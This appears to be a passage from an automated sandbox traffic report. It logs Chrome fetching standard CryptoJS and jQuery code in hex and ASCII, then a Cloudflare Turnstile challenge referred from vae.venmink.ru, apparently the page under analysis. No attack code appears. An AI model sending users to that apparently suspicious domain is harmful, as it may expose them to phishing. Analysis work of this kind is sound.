                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3dA8t%2FaZCW1egUl60rg%2F0IITtWWwL4zXIZljkekeEa7ecDwo1SIOU2cYKVzPn%2BUXOBeDhJpOjrGnKk9VapEFzn%2F2iz2DPmGMeYb7P5BPvhiNj7zKYgRwczlhCeCy24kNIfVXwntE"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                    Strict-Transport-Security: max-age=15780000
                                                                    Server: cloudflare
                                                                    CF-RAY: 8f48e5817e8d8ca7-EWR
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    2024-12-19 16:51:17 UTC410INData Raw: 37 62 65 61 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b
                                                                    Data Ascii: 7bea!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){
                                                                    2024-12-19 16:51:17 UTC1369INData Raw: 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 63 72 65
                                                                    Data Ascii: f globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.cre
                                                                    2024-12-19 16:51:17 UTC1369INData Raw: 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 77 6f 72 64 73 3d 74 68 69 73 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 72 61 6e 64 6f 6d 42 79 74 65 73
                                                                    Data Ascii: call(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.randomBytes
                                                                    2024-12-19 16:51:17 UTC1369INData Raw: 70 65 6f 66 20 74 26 26 28 74 3d 66 2e 70 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 68 2e 63 65 69 6c 28 73 29 3a 68 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 6e 3d 68 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 61 3d 30 3b 61 3c 63
                                                                    Data Ascii: peof t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a=0;a<c
                                                                    2024-12-19 16:51:17 UTC1369INData Raw: 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 45 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 45 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 45 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d 3e 3e 3e 30 3c 45 5b 32 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 34 5d 3d 65 5b 34 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 33 5d 3e 3e 3e 30 3c 45 5b 33 5d 3e 3e 3e
                                                                    Data Ascii: var t=this._X,e=this._C,r=0;r<8;r++)E[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)|0,e[4]=e[4]+3545052371+(e[3]>>>0<E[3]>>>
                                                                    2024-12-19 16:51:17 UTC1369INData Raw: 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49 5b 30 5d 3c 3c 31 36 7c 49 5b 30
                                                                    Data Ascii: for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I[0]<<16|I[0
                                                                    2024-12-19 16:51:17 UTC1369INData Raw: 72 2c 74 2e 62 79 74 65 4f 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69 6e 67 69 66 79 3a 66
                                                                    Data Ascii: r,t.byteOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={stringify:f
                                                                    2024-12-19 16:51:17 UTC1369INData Raw: 68 61 72 41 74 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50
                                                                    Data Ascii: harAt(64);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOP
                                                                    2024-12-19 16:51:17 UTC1369INData Raw: 61 2e 73 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20 6f 3d 74 68 69
                                                                    Data Ascii: a.sin(t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var o=thi
                                                                    2024-12-19 16:51:17 UTC1369INData Raw: 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c 31 35 2c 41
                                                                    Data Ascii: ),m=C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,15,A


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    6192.168.2.549729151.101.66.1374431100C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-12-19 16:51:17 UTC358OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                    Host: code.jquery.com
                                                                    Connection: keep-alive
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                    Accept: */*
                                                                    Sec-Fetch-Site: none
                                                                    Sec-Fetch-Mode: cors
                                                                    Sec-Fetch-Dest: empty
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    2024-12-19 16:51:17 UTC611INHTTP/1.1 200 OK
                                                                    Connection: close
                                                                    Content-Length: 89501
                                                                    Server: nginx
                                                                    Content-Type: application/javascript; charset=utf-8
                                                                    Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                    ETag: "28feccc0-15d9d"
                                                                    Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                    Access-Control-Allow-Origin: *
                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                    Via: 1.1 varnish, 1.1 varnish
                                                                    Accept-Ranges: bytes
                                                                    Date: Thu, 19 Dec 2024 16:51:17 GMT
                                                                    Age: 3148609
                                                                    X-Served-By: cache-lga21931-LGA, cache-nyc-kteb1890080-NYC
                                                                    X-Cache: HIT, HIT
                                                                    X-Cache-Hits: 55, 6
                                                                    X-Timer: S1734627077.422004,VS0,VE0
                                                                    Vary: Accept-Encoding
                                                                    2024-12-19 16:51:17 UTC16384INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                    Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                    2024-12-19 16:51:17 UTC16384INData Raw: 2c 64 5d 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 69 66 28 70 26 26 28 64 3d 73 3d 28 72 3d 28 69 3d 28 6f 3d 28 61 3d 65 29 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6f 5b 61 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 29 5b 68 5d 7c 7c 5b 5d 29 5b 30 5d 3d 3d 3d 6b 26 26 72 5b 31 5d 29 2c 21 31 3d 3d 3d 64 29 77 68 69 6c 65 28 61 3d 2b 2b 73 26 26 61 26 26 61 5b 6c 5d 7c 7c 28 64 3d 73 3d 30 29 7c 7c 75 2e 70 6f 70 28 29 29 69 66 28 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 64 26 26 28 70 26 26 28 28 69 3d 28 6f 3d 61 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c
                                                                    Data Ascii: ,d];break}}else if(p&&(d=s=(r=(i=(o=(a=e)[S]||(a[S]={}))[a.uniqueID]||(o[a.uniqueID]={}))[h]||[])[0]===k&&r[1]),!1===d)while(a=++s&&a&&a[l]||(d=s=0)||u.pop())if((x?a.nodeName.toLowerCase()===f:1===a.nodeType)&&++d&&(p&&((i=(o=a[S]||(a[S]={}))[a.uniqueID]|
                                                                    2024-12-19 16:51:17 UTC16384INData Raw: 22 6d 73 2d 22 29 2e 72 65 70 6c 61 63 65 28 7a 2c 55 29 7d 76 61 72 20 56 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 2b 65 2e 6e 6f 64 65 54 79 70 65 7d 3b 66 75 6e 63 74 69 6f 6e 20 47 28 29 7b 74 68 69 73 2e 65 78 70 61 6e 64 6f 3d 53 2e 65 78 70 61 6e 64 6f 2b 47 2e 75 69 64 2b 2b 7d 47 2e 75 69 64 3d 31 2c 47 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 28 74 3d 7b 7d 2c 56 28 65 29 26 26 28 65 2e 6e 6f 64 65 54 79 70 65 3f 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 74 3a 4f 62 6a 65 63 74 2e
                                                                    Data Ascii: "ms-").replace(z,U)}var V=function(e){return 1===e.nodeType||9===e.nodeType||!+e.nodeType};function G(){this.expando=S.expando+G.uid++}G.uid=1,G.prototype={cache:function(e){var t=e[this.expando];return t||(t={},V(e)&&(e.nodeType?e[this.expando]=t:Object.
                                                                    2024-12-19 16:51:17 UTC16384INData Raw: 72 5d 29 3b 65 6c 73 65 20 4c 65 28 65 2c 63 29 3b 72 65 74 75 72 6e 20 30 3c 28 61 3d 76 65 28 63 2c 22 73 63 72 69 70 74 22 29 29 2e 6c 65 6e 67 74 68 26 26 79 65 28 61 2c 21 66 26 26 76 65 28 65 2c 22 73 63 72 69 70 74 22 29 29 2c 63 7d 2c 63 6c 65 61 6e 44 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 2c 72 2c 69 3d 53 2e 65 76 65 6e 74 2e 73 70 65 63 69 61 6c 2c 6f 3d 30 3b 76 6f 69 64 20 30 21 3d 3d 28 6e 3d 65 5b 6f 5d 29 3b 6f 2b 2b 29 69 66 28 56 28 6e 29 29 7b 69 66 28 74 3d 6e 5b 59 2e 65 78 70 61 6e 64 6f 5d 29 7b 69 66 28 74 2e 65 76 65 6e 74 73 29 66 6f 72 28 72 20 69 6e 20 74 2e 65 76 65 6e 74 73 29 69 5b 72 5d 3f 53 2e 65 76 65 6e 74 2e 72 65 6d 6f 76 65 28 6e 2c 72 29 3a 53 2e 72 65 6d 6f 76 65 45 76 65
                                                                    Data Ascii: r]);else Le(e,c);return 0<(a=ve(c,"script")).length&&ye(a,!f&&ve(e,"script")),c},cleanData:function(e){for(var t,n,r,i=S.event.special,o=0;void 0!==(n=e[o]);o++)if(V(n)){if(t=n[Y.expando]){if(t.events)for(r in t.events)i[r]?S.event.remove(n,r):S.removeEve
                                                                    2024-12-19 16:51:18 UTC16384INData Raw: 53 2e 65 78 74 65 6e 64 28 7b 61 74 74 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 3d 65 2e 6e 6f 64 65 54 79 70 65 3b 69 66 28 33 21 3d 3d 6f 26 26 38 21 3d 3d 6f 26 26 32 21 3d 3d 6f 29 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 3f 53 2e 70 72 6f 70 28 65 2c 74 2c 6e 29 3a 28 31 3d 3d 3d 6f 26 26 53 2e 69 73 58 4d 4c 44 6f 63 28 65 29 7c 7c 28 69 3d 53 2e 61 74 74 72 48 6f 6f 6b 73 5b 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 28 53 2e 65 78 70 72 2e 6d 61 74 63 68 2e 62 6f 6f 6c 2e 74 65 73 74 28 74 29 3f 63 74 3a 76 6f 69 64 20 30 29 29 2c 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 75 6c 6c 3d 3d 3d 6e 3f 76 6f 69 64 20 53 2e 72 65 6d
                                                                    Data Ascii: S.extend({attr:function(e,t,n){var r,i,o=e.nodeType;if(3!==o&&8!==o&&2!==o)return"undefined"==typeof e.getAttribute?S.prop(e,t,n):(1===o&&S.isXMLDoc(e)||(i=S.attrHooks[t.toLowerCase()]||(S.expr.match.bool.test(t)?ct:void 0)),void 0!==n?null===n?void S.rem
                                                                    2024-12-19 16:51:18 UTC7581INData Raw: 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 69 2e 78 68 72 28 29 3b 69 66 28 72 2e 6f 70 65 6e 28 69 2e 74 79 70 65 2c 69 2e 75 72 6c 2c 69 2e 61 73 79 6e 63 2c 69 2e 75 73 65 72 6e 61 6d 65 2c 69 2e 70 61 73 73 77 6f 72 64 29 2c 69 2e 78 68 72 46 69 65 6c 64 73 29 66 6f 72 28 6e 20 69 6e 20 69 2e 78 68 72 46 69 65 6c 64 73 29 72 5b 6e 5d 3d 69 2e 78 68 72 46 69 65 6c 64 73 5b 6e 5d 3b 66 6f 72 28 6e 20 69 6e 20 69 2e 6d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 28 69 2e 6d 69 6d 65 54 79 70 65 29 2c 69 2e 63 72 6f 73 73 44 6f 6d 61 69 6e 7c 7c 65 5b 22 58 2d 52 65 71 75 65 73 74 65 64 2d 57 69 74 68 22 5d 7c 7c 28 65 5b 22 58 2d 52
                                                                    Data Ascii: :function(e,t){var n,r=i.xhr();if(r.open(i.type,i.url,i.async,i.username,i.password),i.xhrFields)for(n in i.xhrFields)r[n]=i.xhrFields[n];for(n in i.mimeType&&r.overrideMimeType&&r.overrideMimeType(i.mimeType),i.crossDomain||e["X-Requested-With"]||(e["X-R


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    7192.168.2.549734104.18.94.414431100C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-12-19 16:51:18 UTC794OUTGET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/njfi6/0x4AAAAAAA0WiiyS1ss3H6RW/auto/fbE/normal/auto/ HTTP/1.1
                                                                    Host: challenges.cloudflare.com
                                                                    Connection: keep-alive
                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                    sec-ch-ua-mobile: ?0
                                                                    sec-ch-ua-platform: "Windows"
                                                                    Upgrade-Insecure-Requests: 1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Sec-Fetch-Site: cross-site
                                                                    Sec-Fetch-Mode: navigate
                                                                    Sec-Fetch-Dest: iframe
                                                                    Referer: https://vae.venmink.ru/
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    2024-12-19 16:51:19 UTC1362INHTTP/1.1 200 OK
                                                                    Date: Thu, 19 Dec 2024 16:51:18 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 26678
                                                                    Connection: close
                                                                    cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
